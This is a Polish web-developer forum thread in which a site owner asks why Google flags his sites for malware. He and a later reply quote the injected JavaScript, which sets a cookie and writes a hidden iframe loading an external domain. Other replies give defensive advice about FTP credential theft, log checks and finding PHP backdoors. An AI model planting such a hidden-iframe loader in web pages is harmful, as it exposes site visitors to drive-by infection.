GoldenLine
Zaloguj się
Raphael Brick

Raphael Brick Vince in bono
malum...

Temat: Google i złosliwe oprogramowanie

Witam
Do końca nie jestem pewny czy wybrałem dobrą grupę, ale problem mam tego tepu że od kilku dni google zgłasza mi że wykrył na mojej stronie złośliwe oprogramowanie i robi to systematycznie co dwa dni za każdym razem na kolejnej stronie ( na serwerze mam kilka postawionych stron ). W zarządzaniu stronami na google pojawia się jako złosliwe oprogramowanie taki kod :
<script language="JavaScript" type="text/javascript">
if (document.cookie.search("yjy=3") == -1) {
pld=document.getElementById('lkjx');if(pld==null){document.w
rite('<iframe id=lkjx src=http://hostads.cn style=display:no
ne></iframe>');}
document.cookie = "yjy=3;expires=Sun, 01-Dec-2011 08:00:00 G
MT;path=/";}
</script>
Na swoich stronach nie mam liczników ani żadnych dziwnych skryptów a w wiekszości konstrukcja polega na połączeniu php i smarty i jquery.

Macie jakieś pomysły jak się to przykleja do moich stron i jak się zabezpieczyć przed tym uciążliwym problemem ?

pozdrawiam
Link do wypowiedziLink
Jakub L.

Jakub L. Programista

Temat: Google i złosliwe oprogramowanie

Na serwerze sprawdziłeś?
Trojan podczas transferu przez ftp?
Link do wypowiedziLink
Raphael Brick

Raphael Brick Vince in bono
malum...

Temat: Google i złosliwe oprogramowanie

Jak to sprawdzić na serwerze ? Swój komputer przeskanowałem i raczej jest czysty.
Link do wypowiedziLink
Maciek Kuchnik

Maciek Kuchnik Właściciel
Indelso.pl,
programista, PM

Temat: Google i złosliwe oprogramowanie

Najpierw zmień hasło do ftpa, potem przeszukaj kod pod względem tego:

<script language="JavaScript" type="text/javascript">
if (document.cookie.search("yjy=3") == -1) {
pld=document.getElementById('lkjx');if(pld==null){document.w
rite('<iframe id=lkjx src=hostads.cn style=display:no
ne></iframe>');}
document.cookie = "yjy=3;expires=Sun, 01-Dec-2011 08:00:00 G
MT;path=/";}
</script>

miałem podobny przypadek, zmiana haseł i usunięcie tego z plików rozwiązało sprawe
Link do wypowiedziLink

konto usunięte

Temat: Google i złosliwe oprogramowanie

Najlepiej mieć dostęp ssh do maszyny i zapodać grep -nr hostads *Mateusz Jaworski edytował(a) ten post dnia 06.10.10 o godzinie 08:48
Link do wypowiedziLink
Raphael Brick

Raphael Brick Vince in bono
malum...

Temat: Google i złosliwe oprogramowanie

niestety ssh brak
tymczasem zmieniłem hasła i wgrałem świeże :) kopie plików
Link do wypowiedziLink
Bartłomiej Ogryczak

Bartłomiej Ogryczak Backend Developer @
Layar

Temat: Google i złosliwe oprogramowanie

Rafał Cegiełka:
Witam
Do końca nie jestem pewny czy wybrałem dobrą grupę

IMHO bardziej pasuje ta:
http://www.goldenline.pl/grupa/programisci-www
Link do wypowiedziLink
Raphael Brick

Raphael Brick Vince in bono
malum...

Temat: Google i złosliwe oprogramowanie

2010-10-06 11:16:41
Ataki na serwery MasteNET.pl
Informujemy, iż od pewnego czasu borykamy się z licznymi atakami prowadzonymi na serwery MasterNET.pl
Czyżby konkurencja?
Prosimy o cierpliwość oraz wyrozumiałość.
Link do wypowiedziLink
Marcin Lenkowski

Marcin Lenkowski Szukasz
programistów?
Zapraszamy do
Exulto!

Temat: Google i złosliwe oprogramowanie

Sam miałem takie problemy do rozwiązania kiedyś. Możliwe że to nie wina serwera, lecz programu do FTP. Przykładowo jeśli masz wirusa i wykorzystujesz program Total Commander, który hasła trzyma na twoim komputerze w niezakodowanej formie, są one po prostu wykradane :) Zmiana hasła FTP i zmiana programu, na np. FileZille może wyeliminować te problemy.Marcin Lenkowski edytował(a) ten post dnia 12.10.10 o godzinie 10:06
Link do wypowiedziLink
Paweł Lenk

Paweł Lenk informatyk,
programista,
bezpieczeństwo,PBX
Asterisk

Temat: Google i złosliwe oprogramowanie

Witam.

Sprawdź w logach FTP czy nie pojawiło się coś co pobierało pliki index.* z jednego IP, a chwile potem nie wrzucało te same pliki ciut większe z innego IP. (se proxy roboty wykorzystują). Na 99% włam przez FTP. Chyba że są tam jakieś writemody i inne wynalazki, ale wątpię. Zmiana hasła na FTP leczy tego typu rzeczy.
Link do wypowiedziLink
Mateusz K.

Mateusz K. Business Solution
Analyst, Damco
Poland Sp z o.o.

Temat: Google i złosliwe oprogramowanie

Skłaniałbym się ku stwierdzeniu, że na 95% to włam przez FTP. Na 5% błąd w oprogramowaniu, np. osc ma/miało lukę dzięki której można było wgrywać pliki na serwer. Próbę wyszukiwania znanych skyrptów php przez bota widać w logach po tym, że wywoływane są adresy url do phpmyadmina, osc itd. Skrypt sprawdza, czy takie oprogramowanie jest na serwerze.
Link do wypowiedziLink
Piotr Kamiński

Piotr Kamiński programista i
sieciowy wytwarzacz

Temat: Google i złosliwe oprogramowanie

Jesli komputer jest 'raczej czysty' to polecam sie zakrecic za tym aby byl na pewno ;) U mnie dopiero czwarty z rzedu antywirus odnalazl parszywe robaki - polecam Kasperskiego - PcCillin, Sophos i Avast nie daly rady. Obowiazkowa akcja to jak juz inni wspomnieli zmiana hasla do ftpa i nie zapisywanie go w programach pokroju filezilli czy total cmomandera. Warto tez zaciagnac wszystkie pliki z serwera i przejrzec czy nie pojawily sie jakies nowe, bywa ze na ftpy poza zlosliwym kodem js sa wgrywane backdoory w php (jest zgodnie z tematyka grupy ;). Najczesciej mozna je latwo wszukac znajdujac pliki zawierajace funkcje move_uploaded_file().
Link do wypowiedziLink
« Wróć do tematów
Odpowiedz

Podobne tematy


Następna dyskusja:

google cache




Wyślij zaproszenie do
Anuluj